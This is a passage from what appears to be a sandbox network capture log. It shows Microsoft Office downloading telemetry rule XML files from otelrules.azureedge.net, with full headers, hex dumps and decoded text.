                                                                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                          x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180145Z-178bfbc474btrnf9hC1NYCb80g00000004x000000000fat3
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:45 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          47192.168.2.54975713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:45 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:45 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                                                                          x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180145Z-174c587ffdfp4vpjhC1TEBybqw000000037g00000000fr9b
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          48192.168.2.54975613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:45 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:45 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                          x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180145Z-178bfbc474bwh9gmhC1NYCy3rs00000005000000000000vq
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:46 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          49192.168.2.54975813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:45 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:45 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 400
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                                                                          x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180145Z-178bfbc474bpnd5vhC1NYC4vr400000004v0000000006yeb
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:46 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          50192.168.2.54976313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:47 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:48 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                          x-ms-request-id: 9177d9ad-001e-0028-350e-3dc49f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180148Z-178bfbc474bh5zbqhC1NYCkdug00000004s000000000a3mw
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:48 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          51192.168.2.54976113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:47 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:48 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 448
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                                                                          x-ms-request-id: 008bef3b-f01e-001f-677c-3b5dc8000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180148Z-174c587ffdfmlsmvhC1TEBvyks00000003dg00000000bhd4
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:48 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          52192.168.2.54975913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:47 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:48 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 425
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                                                                          x-ms-request-id: ea4907c4-101e-0079-4064-3d5913000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180148Z-174c587ffdftv9hphC1TEBm29w000000035000000000gctc
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:48 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          53192.168.2.54976013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:47 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:48 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 475
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                          x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180148Z-178bfbc474b9fdhphC1NYCac0n00000004n000000000ky5h
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:48 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          54192.168.2.54976213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:47 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:48 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 491
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                                                                          x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180148Z-178bfbc474b9fdhphC1NYCac0n00000004n000000000ky5k
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:48 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          55192.168.2.54976813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:50 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:50 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                                                                          x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180150Z-178bfbc474bnwsh4hC1NYC2ubs000000050000000000003h
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:50 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          56192.168.2.54977413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:50 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:50 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                          Connection: close
